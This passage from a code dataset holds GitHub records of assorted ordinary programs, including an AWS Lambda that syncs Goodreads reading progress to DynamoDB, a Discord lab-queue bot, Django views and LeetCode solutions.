mordred_std)\n if DEBUG: print(\"标准化完成....\")\n pass\n","repo_name":"ToLoveToFeel/TL-MDC","sub_path":"code/file_process/file_target_processing.py","file_name":"file_target_processing.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38223149116","text":"import boto3\nimport dynamodb_json as ddbjson\nimport feedparser\nimport json\nimport re\nimport urllib3\nimport uuid\nimport yaml\n\nfrom copy import deepcopy\nfrom datetime import datetime, timedelta\nfrom dateutil import tz\n\n# =====================================================================\n# Convert a timestamp string as it appears in the Goodreads RSS feed\n# to a string of the form YYYYMMDD-HHMMSS\n# =====================================================================\ndef ts_to_dtstr(ts):\n dt = datetime.strptime(ts, \"%a, %d %b %Y %H:%M:%S %z\")\n dt_utc = dt.astimezone(tz.gettz('UTC'))\n dt_utc_str = dt_utc.strftime(\"%Y%m%d-%H%M%S\")\n return dt_utc_str\n\n# =====================================================================\n# FIND THE DICT WITH GIVEN k==v FROM A LIST, IF IT EXISTS.\n# RETURN None OTHERWISE.\n# =====================================================================\ndef find_item_in(test_list, k, v):\n return next((item for item in test_list if item[k] == v), None)\n\n# =====================================================================\n# VALIDATE THE CONTENTS OF A DICT.\n# req_attrs AND opt_attrs MUST BE DEFINED\n# =====================================================================\ndef validate_input_item(input_item):\n all_attrs = req_attrs + opt_attrs\n is_valid = True\n # check required attribtues\n for ra in req_attrs:\n if ra not in input_item.keys():\n print(f\"Required attribute ({ra}) not found in input item\")\n is_valid = False\n # check all attributes\n for k in input_item.keys():\n if k not in all_attrs:\n print(f\"Invalid attribute ({k}) found in input item\")\n is_valid = False\n # Check rating attribute (only if not blank)\n #if ('rating' in input_item.keys()) and (input_item['rating'] != \"\"):\n # try:\n # rt = int(input_item['rating'])\n # if rt not in range(1,6):\n 
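handle_by_idx above rebuilds the feature matrix column by column through a transpose; NumPy fancy indexing selects the same columns in one expression, with the +2 offset accounting for the smiles/rt prefix columns noted in the comment. A sketch on a one-row toy array (the function name is mine):

import numpy as np

def handle_by_idx_fast(data, idx):
    # Keep smiles and rt (columns 0-1) plus the selected feature columns.
    cols = [0, 1] + [i + 2 for i in idx]
    return data[:, cols]

data = np.array([['C1=CC=CC=C1', 3.2, 10, 20, 30, 40]], dtype=object)
print(handle_by_idx_fast(data, [0, 2]))  # smiles, rt, features 0 and 2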
# raise ValueError\n # except ValueError:\n # is_valid = False\n return is_valid\n\n# =====================================================================\n# GET THE VALUE FOR A GIVEN ATTRIBUTE IN A DICT, IF IT EXISTS\n# RETURN None OTHERWISE\n# =====================================================================\ndef get_value(test_item, k):\n return test_item[k] if k in test_item.keys() else None\n\n# =====================================================================\n# RETURN THE VALUE FROM A DICT IN A GIVEN LIST IF THE NAME MATCHES\n# =====================================================================\ndef get_value_from(test_list, name):\n return next((item['Value'] for item in test_list if item['Name'] == name), None)\n\n# =====================================================================\n# Remove non-alphabetic characters from attribute names\n# =====================================================================\ndef conv_attr_str(instr):\n regex = re.compile('[^a-zA-Z]')\n #First parameter is the replacement, second parameter is your input string\n return regex.sub('', instr)\n\n# =====================================================================\n# LAMBDA HANDLER FUNCTION\n# =====================================================================\ndef lambda_handler(event, context):\n\n #--\n #-- GET PARAMETERS FROM PARAMETER STORE\n #--\n ssm_client = boto3.client('ssm')\n parameters = [\n 'OMG_API_KEY',\n 'TRAKT_HISTORY_INTERVAL'\n ]\n resp_ssm = ssm_client.get_parameters(Names=parameters)\n omg_api_key = get_value_from(resp_ssm['Parameters'], 'OMG_API_KEY')\n display_days = int(get_value_from(resp_ssm['Parameters'], 'TRAKT_HISTORY_INTERVAL'))\n\n #--\n #-- CONFIGURATION\n #--\n \n # GENERAL CONFIGURATION\n content_version = '7'\n type_names = {\n \"B\": \"Books\",\n \"L\": \"Listening\",\n \"R\": \"Other Reading\",\n \"W\": \"Watching\",\n \"T\": \"Tinkering\"\n }\n global req_attrs\n req_attrs = ['title', 'type']\n global opt_attrs \n opt_attrs = ['id', 'icon', 'url', 'progress', 'last-episode', 'delete', 'rating', 'note', 'trakt_id']\n \n # DYNAMO DB CONFIG\n table_name = f\"now-content-v{content_version}\"\n \n # RSS FEED URL\n rss_url = \"https://www.goodreads.com/user/updates_rss/6976996\"\n\n oneweekago = datetime.now() - timedelta(days=display_days)\n owa_str = oneweekago.strftime('%Y%m%d-000000')\n\n #--\n #-- LOAD ITEMS FROM GOODREADS RSS FEED AND ADD TO THE INPUT ITEMS\n #--\n feed = feedparser.parse(rss_url)\n book_list = {}\n for entry in feed['entries'][::-1]:\n summary = entry['summary']\n book_progress = None\n \n # Skip old entries\n published = ts_to_dtstr(entry['published'])\n if published <= owa_str:\n continue\n \n # Extract book URL\n m1 = re.search('href=\"([^\"]*)\"', summary)\n if m1:\n book_url = m1.group(1)\n else:\n # Skip if no URL\n continue\n\n # Extract book title\n m2 = re.search('title=\"([^\"]*)\"', summary)\n if m2:\n book_title = m2.group(1)\n else:\n # Skip if no title\n continue\n \n # Started reading; don't overwrite book_progress is not present\n m2b = re.search('started reading', summary)\n if m2b:\n book_progress = 0\n \n # Extract book progress\n m3 = re.search('is (\\d+)% done', summary)\n if m3:\n book_progress = int(m3.group(1))\n \n m3b = re.search('is on page (\\d+) of (\\d+)', summary)\n if m3b:\n book_progress = int( round( ( int(m3b.group(1)) / int(m3b.group(2)) ) * 100, 0) )\n\n # Book finished?\n m4 = re.search('finished reading', summary)\n if m4:\n book_progress = 100\n \n # Extract book rating\n m5 = 
re.search('gave (\\d) star', summary) # scale of 5\n book_rating = int(m5.group(1)) if m5 else None\n \n # populate a dict in case the same title appears more than once\n if isinstance(book_progress,int) or book_rating:\n ts = datetime.now().strftime('%Y%m%d-%H%M%S')\n if book_url not in book_list.keys():\n book_list[book_url] = {} # create empty dict\n \n # book exists, overwrite with current values\n book_list[book_url]['id'] = book_url\n book_list[book_url]['title'] = book_title\n book_list[book_url]['type'] = 'B'\n book_list[book_url]['url'] = book_url\n book_list[book_url]['icon'] = 'book'\n if isinstance(book_progress, int):\n book_list[book_url]['progress'] = str(book_progress)\n if book_rating:\n book_list[book_url]['rating'] = str(book_rating)\n\n # BUILD input_items from book_list\n input_items = [v for v in book_list.values()]\n\n # GET DYNAMODB CLIENT\n ddb_client = boto3.client('dynamodb')\n ddb_resource = boto3.resource('dynamodb')\n ddb_table = ddb_resource.Table(table_name)\n\n #--\n #-- GET \"RECENT\" ITEMS FROM DYNAMODB\n #--\n resp = ddb_table.scan(\n TableName=table_name,\n Select='ALL_ATTRIBUTES',\n ExpressionAttributeNames={\"#modified\": \"modified\"},\n ExpressionAttributeValues={':ONEWEEKAGO': owa_str},\n FilterExpression=\"#modified >= :ONEWEEKAGO\"\n )\n recent_items_d = resp['Items']\n recent_items = ddbjson.loads(recent_items_d)\n print(\">>> Loaded {} recent items from DynamoDB\".format(len(recent_items)))\n \n #--\n #-- COMPARE INPUT ITEMS TO RECENT ITEMS\n #--\n updated_items = [] # LIST OF UPDATED ITEMS, INCL. MODIFIED ATTRS ONLY\n new_items = [] # LIST OF COMPLETE ITEMS\n for input_item in input_items:\n\n # Get the item's ID, if it exists\n item_id = get_value(input_item, 'id')\n\n # Look for the item ID in the list of recent items (from DynamoDB)\n recent_item = find_item_in(recent_items, 'id', item_id)\n if recent_item is None:\n # This is a new book. 
Add timestamps and append to new_items\n            input_item['modified'] = ts\n            input_item['created'] = ts\n            new_items.append(deepcopy(input_item))\n        else:\n            # This is a recent item.\n            # Check for differences between input_item and recent_item.\n            # We're only looking at the input_item's keys here.\n            upd = False\n            updated_item = {}\n            updated_item['id'] = item_id\n\n            # Check for attributes in input_item (RSS) that are not in recent_item (DynamoDB)\n            # If there are differences, input_item will take precedence\n            for k in input_item.keys():\n                if k in ['modified', 'created']:\n                    # Ignore timestamps\n                    continue\n                if (k not in recent_item) or (recent_item[k] != input_item[k]):\n                    print(f\"*** Adding or updating attribute ({k}) for id={item_id}\")\n                    upd = True\n                    updated_item[k] = str(input_item[k])\n\n            if upd:\n                updated_item['modified'] = datetime.now().strftime('%Y%m%d-%H%M%S')\n                updated_items.append(deepcopy(updated_item))\n\n    #--\n    #-- INSERT NEW ITEMS IN DYNAMODB\n    #--\n    if len(new_items) > 0:\n        for new_item in new_items:\n            print(f\"*** Adding new item: {new_item['title']}\")\n            new_item_d = ddbjson.dumps(new_item, as_dict=True)\n            ddb_client.put_item(TableName=table_name, Item=new_item_d)\n    else:\n        print(\">>> No new items to create\")\n\n    #--\n    #-- UPDATE ITEMS IN DYNAMODB\n    #--\n    if len(updated_items) > 0:\n        for updated_item in updated_items:\n            item_id = updated_item['id']\n            print(f\"*** Updating item: id={item_id}\")\n            expr_attr_vals = {}\n            expr_attr_nams = {}\n            upd_exprs_set = [] # list of \"attribute token = value token\" strings for SET\n            upd_exprs_rem = [] # list of attribute tokens to REMOVE\n
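            # Worked example (values illustrative): updated_item = {'id': ..., 'progress': '45', 'note': ''}\n            # yields ExpressionAttributeNames {'#progress': 'progress', '#note': 'note'},\n            # ExpressionAttributeValues {':progress': {'S': '45'}} and\n            # UpdateExpression \"SET #progress=:progress REMOVE #note\" -- blank values\n            # become REMOVEs, and the #/: aliases (non-alphabetic characters stripped)\n            # keep raw attribute names out of the expression itself.\n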
            for i, attr in enumerate(updated_item.keys()):\n                if attr != 'id':\n                    attr_alias = conv_attr_str(attr)\n                    attr_token = f\"#{attr_alias}\"\n                    valu_token = f\":{attr_alias}\"\n                    expr_attr_nams[attr_token] = attr\n                    if updated_item[attr] == \"\":\n                        upd_exprs_rem.append(attr_token)\n                    else:\n                        expr_attr_vals[valu_token] = {'S': updated_item[attr] }\n                        upd_exprs_set.append(f\"{attr_token}={valu_token}\")\n\n            upd_expr = \"\"\n            if len(upd_exprs_set) > 0:\n                upd_expr += \"SET \" + ','.join(upd_exprs_set)\n            if len(upd_exprs_rem) > 0:\n                upd_expr += \" REMOVE \" + ','.join(upd_exprs_rem)\n            print(\"*** - UPDATE EXPR: \", upd_expr)\n\n            ddb_client.update_item(\n                TableName=table_name,\n                Key={\"id\": {'S': item_id}},\n                ExpressionAttributeValues=expr_attr_vals,\n                ExpressionAttributeNames=expr_attr_nams,\n                UpdateExpression=upd_expr\n            )\n    else:\n        print(\">>> No items to update\")\n\n    #--\n    #-- IF THERE WERE ANY CHANGES, TRIGGER THE NOW PAGE CONTENT GENERATOR\n    #--\n\n    if (len(updated_items)>0) or (len(new_items)>0):\n        print(\"*** Sending message to SQS queue (to trigger NOW page rebuild)\")\n        # GET SQS CLIENT\n        sqs_client = boto3.client('sqs')\n        resp_sqs = sqs_client.send_message(\n            QueueUrl = 'https://sqs.us-east-2.amazonaws.com/400999793714/now-page-triggers',\n            MessageBody = '{}'\n        )\n","repo_name":"mihobu/mihobu.omg.lol","sub_path":"goodreadsbot/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":11734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"3484951883","text":"#!/usr/bin/python3\n\n# data types and variables\n\nstring = 'Isso é uma string'\ninteiro = 10\nflutuante = 10.6\n\n\n# input and output\n\nnome = input('Digite seu nome: ') # data input\nprint(nome) # output\nimport keyword\n\nprint(f'palavras que não podem ser usadas para atribuir variáveis {keyword.kwlist}')\n\n# data structures\n\n## lists\n\nitens = [1, 2.0, 'string', [1,6,9], 'uva']\nitens.append('novo item')\nitens.remove(2.0)\nitens.pop(2)\nitens.insert(4, 'Outra coisa')\nitens[1] = 'Novo valor'\n\n\nprint(itens[3])\n\n\n## tuples - immutable\n\ndado = (10, 2.0, 'Teste', True)\n\n## dictionary\n\ndados = {'nome': 'Renato',\n    'Idade': 27,\n    'Linguagem preferida': 'Python e GO'\n}\n\ndados.keys()\ndados.values()\n\n\n# loop structures\n\n## while\n\nusers = ['Barbara', 'Carlos', 'Ramon']\nwhile True:\n    login = input('Digite seu login: ')\n    if login in users:\n        print('Acesso permitido')\n        break\n    else:\n        print('Acesso Negado')\n        continue\n\nfor index, nome in enumerate(users):\n    print(index, nome)\n","repo_name":"FabioGUB/Python.Fundamentals-","sub_path":"aula2/recap.py","file_name":"recap.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"18206821542","text":"import functools\nimport math\n\n\nclass Solution:\n    def findRotateSteps(self, ring: str, key: str) -> int:\n        # Number of rotates of ring to match key[index:]\n        @functools.lru_cache(None)\n        def dfs(ring: str, index: int) -> int:\n            if index == len(key):\n                return 0\n\n            ans = math.inf\n\n            # For each ring[i] == key[index]\n            # We rotate the ring to match ring[i] w/ key[index]\n            # Then recursively match newRing w/ key[index + 1:]\n            for i, r in enumerate(ring):\n                if r == key[index]:\n                    minRotates = min(i, len(ring) - i)\n                    newRing = ring[i:] + ring[:i]\n                    remainingRotates = dfs(newRing, index + 1)\n                    ans = min(ans, minRotates + remainingRotates)\n\n            return ans\n\n        return dfs(ring, 0) + len(key)\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0514. Freedom Trail/0514.py","file_name":"0514.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"}
+{"seq_id":"29806453848","text":"from setuptools import setup, find_packages\n\nwith open('README.md') as f:\n    readme = f.read()\n\nwith open('LICENSE') as f:\n    license = f.read()\n\nsetup(\n    name='py1337',\n    version='1.0.0',\n    description='Post 1337 to a Whatsapp group at 13:37.',\n    url='https://github.com/DomiDre/py1337',\n    author='Dominique Dresen',\n    author_email='dominiquedresen@gmail.com',\n    license=license,\n    long_description=readme,\n    install_requires=[\n        'selenium'\n    ],\n    python_requires='>2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*',\n    platforms=['Linux'],\n    package_dir={'py1337': 'py1337'},\n    packages=find_packages(\n        exclude=(\n            '_build',\n            'docs',\n            '_static',\n            '_templates',\n            'tests',\n            'examples'\n        )\n    ),\n    keywords='whatsapp 1337'\n)","repo_name":"DomiDre/py1337","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"37219055681","text":"# Definition for a Node.\nclass Node:\n    def __init__(self, val):\n        self.val = val\n        self.left = None\n        self.right = None\n        self.parent = None\n\n\nclass Solution:\n    def lowestCommonAncestor(self, p: 'Node', q: 'Node') -> 'Node':\n        def dfs(path, node): # build the path from the node up to the root\n            if node.parent is None:\n                path.append(node)\n            else:\n                path.append(node)\n                dfs(path, node.parent)\n\n        def compare(arr1, arr2):\n            if arr1[0] != arr2[0]: # if the roots differ, there is no common ancestor\n                return None\n            output = arr1[0]\n            while arr1 and arr2:\n                A = arr1.pop(0)\n                B = arr2.pop(0)\n                if A == B:\n                    output = A\n            return output\n\n        p_up = []\n        q_up = []\n        dfs(p_up, p)\n        dfs(q_up, q)\n\n        return compare(p_up[::-1], q_up[::-1]) # compare from root to bottom\n","repo_name":"renjieliu/leetcode","sub_path":"1500_1999/1650.py","file_name":"1650.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
+{"seq_id":"30656313704","text":"# Ch.03.4 Performance of 365 Day Skill Up\n# Start with 1; only the first 10 days of every 30-day month improve the skill by the day factor, the rest of the month is flat\n\n# import math\n\n\ndef dayUP(df):\n    dayup = 1\n\n    for i in range(365):\n        if i % 30 in [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]:\n            dayup = dayup * (1 + df)\n        else:\n            dayup = dayup * (1)\n\n    return dayup\n\n
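# Note (derivable from the loop above): there are 125 up-days in 365 days --\n# 12 full 30-day blocks contribute 10 each, plus days 360-364 -- so\n# dayUP(df) == (1 + df) ** 125; e.g. dayUP(0.01) is roughly 3.47.\n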
\n# dayfactor = (0.01, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.09, 0.10)\ndayfactor = (0.001, 0.002, 0.003, 0.004, 0.005, 0.006, 0.007, 0.008, 0.009, 0.010)\n\nprint(\"365 days: the first 10 days of each 30-day month apply the skill-up factor, the rest are flat.\")\n\nfor i in range(len(dayfactor)):\n    # print(\"Factor {:.2f}: {:.2f}\".format(dayfactor[i], dayUP(dayfactor[i])))\n    print(\"Factor {:.3f}: {:.3f}\".format(dayfactor[i], dayUP(dayfactor[i])))\n","repo_name":"TomFoxLee/Python543","sub_path":"PYECourse/Ch.03/e3.15_365DaySkillUp.py","file_name":"e3.15_365DaySkillUp.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"19373590130","text":"import logging\nimport socket\n\nlogger = logging.getLogger(__name__)\n\n\nclass RPCMessageClient:\n\n    def __init__(self, portNumber: int) -> None:\n        self._serverAddress = ('127.0.0.1', portNumber)\n\n    def send(self, message: str) -> str:\n        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n            sock.connect(self._serverAddress)\n\n            sock.sendall((message + '\\n').encode('utf-8'))\n            logger.debug(f'SEND: \\\"{message}\\\"')\n\n            with sock.makefile(mode='r', encoding='utf-8') as fp:\n                response = fp.readline()\n\n            logger.debug(f'RECV: \\\"{response}\\\"')\n\n            return response\n","repo_name":"AdvancedPhotonSource/ptychodus","sub_path":"ptychodus/model/rpc/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"}
+{"seq_id":"24105806021","text":"import pandas as pd\n\n# load the data\ndata = pd.read_csv('input/event_data.csv', sep='|')\ntext = data.text.dropna()\ntext = '\\n'.join(text)\n\n# write the data into a text file\n\nwith open('input/training_text.txt', 'w') as file:\n    file.write(text)\n","repo_name":"KhalilAMARDJIA/doccano_spacy_fda","sub_path":"raw_to_text.py","file_name":"raw_to_text.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"38989742805","text":"from logging import warning\nimport discord\nfrom discord import channel\nfrom discord import guild\nfrom discord.ext import commands\nimport asyncio\n\n\nclass MyClient(discord.Client):\n    waitingQueue = [] #Holds all members waiting in the queue\n    roomIDs = [809454410543530014, 809454540504039424, 809454553790545950] #The IDs of the Lab \"Rooms\"\n    staffList = []\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n\n        self.bg_task = self.loop.create_task(self.loopQueue())\n\n    async def on_ready(self): #Runs on ready\n        print('Logged in as')\n        print(self.user.name)\n        print(self.user.id)\n        print('------')\n        await self.getStaff()\n\n
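    # Dispatch loop: once a minute, move the member at the front of the waiting\n    # queue into any lab room that currently holds exactly one member who is a\n    # Helper (i.e. a staff member waiting alone in a room).\n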
    async def loopQueue(self):\n        await self.wait_until_ready()\n        while not self.is_closed():\n            for cID in self.roomIDs:\n                if len(self.waitingQueue) == 0:\n                    break\n                for member in list(self.waitingQueue): # iterate over a copy so removal is safe\n                    channel = self.get_channel(cID) # resolve the room from this client's channel cache\n                    if len(channel.members) == 1:\n                        for staffmember in channel.members:\n                            if self.staffList.__contains__(staffmember):\n                                await member.move_to(channel)\n                                self.waitingQueue.remove(member)\n            await asyncio.sleep(60)\n\n    async def getStaff(self):\n        self.staffList.clear()\n        for member in self.get_all_members():\n            for role in member.roles:\n                if str(role) == \"Helper\" and not self.staffList.__contains__(member):\n                    self.staffList.append(member)\n\n    async def checkPermissions(self, message):\n        return message.author.id == 618876946830589963\n        #Can be made so it checks for a role\n\n    async def on_message(self, message):\n        if message.author.id == self.user.id: #Stops the bot responding to itself\n            return\n\n        if message.channel.id != 809454274392227870: #Restrains commands to a single channel\n            return\n\n        if message.content.startswith(\"!queue\") or message.content.startswith(\"!q\"): #Queues members\n            if not self.waitingQueue.__contains__(message.author):\n                if message.author.voice is None:\n                    await message.channel.send((message.author.mention + \": Please join ``🔈 waiting-room`` to queue.\"))\n                elif message.author.voice.channel.id == 809454365164568626:\n                    self.waitingQueue.append(message.author)\n                    await message.add_reaction(\"✅\")\n                else:\n                    await message.channel.send((message.author.mention + \": Please join ``🔈 waiting-room`` to queue.\"))\n            elif self.waitingQueue.__contains__(message.author):\n                await message.delete()\n\n        if message.content.startswith(\"!pos\") or message.content.startswith(\"!position\") or message.content.startswith(\"!p\"): #Shows those queued their position\n            if self.waitingQueue.__contains__(message.author):\n                await message.channel.send(message.author.mention + \": You are position ``\" + str(self.waitingQueue.index(message.author) + 1) + \"``.\")\n            else:\n                await message.channel.send((message.author.mention + \": You are not in the queue.\"))\n\n        if message.content.startswith(\"!vc\") and await self.checkPermissions(message): #Temporary command. Will become automatic\n            await self.wait_until_ready()\n            while not self.is_closed():\n                for cID in self.roomIDs:\n                    if len(self.waitingQueue) == 0:\n                        break\n                    for member in list(self.waitingQueue): # iterate over a copy so removal is safe\n                        channel = discord.utils.get(message.guild.voice_channels, id=cID)\n                        if len(channel.members) == 1:\n                            for staffmember in channel.members:\n                                if self.staffList.__contains__(staffmember):\n                                    await member.move_to(channel)\n                                    self.waitingQueue.remove(member)\n                await asyncio.sleep(60)\n\n        if message.content.startswith(\"!clear\") and await self.checkPermissions(message): #Clears the channel and shows the help dialog box at the start of the channel.\n            await message.channel.send(\"Deleting... 
Please wait, depending on the number of messages this may take a minute.\")\n await message.channel.purge()\n embed=discord.Embed(title=\"Commands\", description=\"QueueBot Commands\", color=0xedcf07)\n embed.add_field(name=\"!queue / !q\", value=\"Enters you into the queue for labs\", inline=False)\n embed.add_field(name=\"!position / !p\", value=\"Shows current position in the queue\", inline=False)\n await message.channel.send(embed=embed)\n\n if message.content.startswith(\"!help\"): #Shows the help dialogue\n embed=discord.Embed(title=\"Commands\", description=\"QueueBot Commands\", color=0xedcf07)\n embed.add_field(name=\"!queue / !q\", value=\"Enters you into the queue for labs\", inline=False)\n embed.add_field(name=\"!position / !p\", value=\"Shows current position in the queue\", inline=False)\n await message.channel.send(embed=embed)\n\n\nclient=MyClient()\nftoken = open(\"token\", \"r\") #Reads in the token needed for bot authentication\ntoken = ftoken.read().strip(\"\\n\") \nclient.run(token)\n","repo_name":"TheTrueShell/QueueBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2884694444","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import redirect, render, get_object_or_404\n\nfrom djarbler.forms import CsrfOnlyForm\nfrom users.models import User\nfrom .forms import MessageCreateForm\nfrom .models import Message\n\n\n@login_required\ndef create(request):\n \"\"\"Create a new message.\"\"\"\n\n if request.method == \"POST\":\n form = MessageCreateForm(request.POST)\n if form.is_valid():\n form.instance.user = request.user\n form.save()\n messages.success(request, \"Warble saved.\")\n return redirect(\"/\")\n else:\n form = MessageCreateForm()\n return render(request, \"warbles/new.html\", {\"form\": form})\n\n\n@login_required\ndef messages_show(request, message_id):\n \"\"\"Show a message.\"\"\"\n\n msg = get_object_or_404(Message, pk=message_id)\n return render(request, 'warbles/show.html', {\"message\": msg})\n\n\n@login_required\ndef messages_destroy(request, message_id):\n \"\"\"Delete a message.\"\"\"\n\n form = CsrfOnlyForm(request.POST)\n msg = get_object_or_404(Message, pk=message_id)\n\n if (request.method != \"POST\" or\n not form.is_valid() or\n msg.user != request.user):\n raise PermissionDenied()\n\n messages.warning(request, \"Message deleted.\")\n msg.delete()\n\n return redirect(f\"/users/{request.user.id}/\")\n\n\n@login_required\ndef toggle_like(request, message_id):\n \"\"\"Toggle a liked message for the currently-logged-in user.\"\"\"\n\n form = CsrfOnlyForm(request.POST)\n user: User = request.user\n\n if request.method != \"POST\" or not form.is_valid():\n raise PermissionDenied()\n\n liked_message = get_object_or_404(Message, pk=message_id)\n if liked_message.user == user:\n raise PermissionDenied(\n \"You're so vain, you probably think this error is about you.\")\n\n if user.liked_messages.contains(liked_message):\n messages.success(request, \"Un-liked.\")\n user.liked_messages.remove(liked_message)\n else:\n messages.success(request, \"Liked.\")\n user.liked_messages.add(liked_message)\n\n return 
redirect(\"/\")\n","repo_name":"joelburton/djarbler","sub_path":"warbles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12540753405","text":"def mergeSort(start,end):\n if start None:\n \"\"\"\n Initialize DataLabeler class.\n\n :param dirpath: path to data labeler\n :param load_options: optional arguments to include for load i.e. class\n for model or processors\n \"\"\"\n if dirpath is not None and not isinstance(dirpath, str):\n raise ValueError(\n \"`dirpath` must be a file directory where a \" \"DataLabeler exists.\"\n )\n # Example: self._model is an instance of BaseModel\n self._model: BaseModel = None # type: ignore\n\n # Example: self._preprocessor and self._postprocessor are instances of\n # DataProcessing\n self._preprocessor: data_processing.BaseDataPreprocessor = None # type: ignore\n self._postprocessor: data_processing.BaseDataPostprocessor = (\n None # type: ignore\n )\n\n # load default model\n if dirpath or self._default_model_loc:\n if dirpath is None:\n dirpath = os.path.join(default_labeler_dir, self._default_model_loc)\n self._load_data_labeler(dirpath, load_options)\n\n def __eq__(self, other: object) -> bool:\n \"\"\"\n Check if two data labelers are equal with one another.\n\n Only checks important variables.\n\n :param self: a data labeler\n :param other: a data labeler\n :type self: BaseDataLabeler\n :type other: BaseDataLabeler\n :return: Whether or not self and other are equal\n :rtype: Bool\n \"\"\"\n if not isinstance(other, BaseDataLabeler):\n return False\n if (\n self._preprocessor != other.preprocessor\n or self._model != other.model\n or self._postprocessor != other.postprocessor\n ):\n return False\n return True\n\n def help(self) -> None:\n \"\"\"\n Describe alterable parameters.\n\n Input data formats for preprocessors.\n Output data formats for postprocessors.\n\n :return: None\n \"\"\"\n print(\"DataLabeler Information:\")\n print(\"=\" * 80)\n sys.stdout.write(\"Preprocessor: \")\n self._preprocessor.help()\n\n print(\"\\n\" + \"=\" * 80)\n sys.stdout.write(\"Model: \")\n self._model.help()\n\n print(\"\\n\" + \"=\" * 80)\n sys.stdout.write(\"Postprocessor: \")\n self._postprocessor.help()\n\n @property\n def label_mapping(self) -> dict:\n \"\"\"\n Retrieve the label encodings.\n\n :return: dictionary for associating labels to indexes\n \"\"\"\n return self._model.label_mapping\n\n @property\n def reverse_label_mapping(self) -> dict:\n \"\"\"\n Retrieve the index to label encoding.\n\n :return: dictionary for associating indexes to labels\n \"\"\"\n return self._model.reverse_label_mapping\n\n @property\n def labels(self) -> list[str]:\n \"\"\"\n Retrieve the label.\n\n :return: list of labels\n \"\"\"\n return self._model.labels\n\n @property\n def preprocessor(self) -> data_processing.BaseDataPreprocessor | None:\n \"\"\"\n Retrieve the data preprocessor.\n\n :return: returns the preprocessor instance\n \"\"\"\n return self._preprocessor\n\n @property\n def model(self) -> BaseModel:\n \"\"\"\n Retrieve the data labeler model.\n\n :return: returns the model instance\n \"\"\"\n return self._model\n\n @property\n def postprocessor(self) -> data_processing.BaseDataPostprocessor | None:\n \"\"\"\n Retrieve the data postprocessor.\n\n :return: returns the postprocessor instance\n \"\"\"\n return self._postprocessor\n\n @staticmethod\n def _check_and_return_valid_data_format(\n data: DataArray, fit_or_predict: str = 
\"fit\"\n ) -> DataArray:\n \"\"\"\n Check incoming data to match the specified fit or predict format.\n\n :param data: data to check\n :type data: Union[pandas.DataFrame, pandas.Series, numpy.array, list]\n :param fit_or_predict: if the data needs to be in fit or predict format\n :type fit_or_predict: str\n :return: validated and formatted data\n \"\"\"\n if fit_or_predict not in [\"fit\", \"predict\"]:\n raise ValueError(\"`fit_or_predict` must equal `fit` or `predict`\")\n\n # Pull dataframe out of data reader object\n if isinstance(data, data_readers.base_data.BaseData):\n data = data.data\n\n if isinstance(data, list):\n data = np.array(data, dtype=\"object\")\n elif isinstance(data, pd.Series) or isinstance(data, pd.DataFrame):\n data = data.values\n elif not isinstance(data, np.ndarray):\n raise TypeError(\n \"Data must be imported using the data_readers, \"\n \"pd.DataFrames, np.ndarrays, or lists.\"\n )\n\n if fit_or_predict == \"fit\":\n return data\n else:\n return np.reshape(data, -1)\n\n def set_params(self, params: dict) -> None:\n \"\"\"\n Allow user to set parameters of pipeline components.\n\n Done in the following format:\n params = dict(\n preprocessor=dict(...),\n model=dict(...),\n postprocessor=dict(...)\n )\n where the key,values pairs for each pipeline component must match\n parameters that exist in their components.\n\n :param params: dictionary containing a key for a given pipeline\n component and its associated value of parameters as such:\n dict(preprocessor=dict(...), model=dict(...),\n postprocessor=dict(...))\n :type params: dict\n :return: None\n \"\"\"\n is_params_error = True\n if params and isinstance(params, dict):\n unknown_keys = set(params.keys()) - {\n \"preprocessor\",\n \"model\",\n \"postprocessor\",\n }\n if not unknown_keys:\n is_params_error = False\n\n if is_params_error:\n raise ValueError(\n \"The params dict must have the following format:\\n\"\n \"params=dict(preprocessor=dict(...), model=dict(...), \"\n \"postprocessor=dict(...)), where each sub-dict contains \"\n \"parameters of the specified data_labeler pipeline components.\"\n )\n elif (\n not self._preprocessor\n and \"preprocessor\" in params\n or not self._model\n and \"model\" in params\n or not self._postprocessor\n and \"postprocessor\" in params\n ):\n raise ValueError(\n \"Parameters for the preprocessor, model, or postprocessor were \"\n \"specified when one or more of these were not set in the \"\n \"DataLabeler.\"\n )\n\n if self._preprocessor and \"preprocessor\" in params:\n self._preprocessor.set_params(**params[\"preprocessor\"])\n if self._model and \"model\" in params:\n self._model.set_params(**params[\"model\"])\n if self._postprocessor and 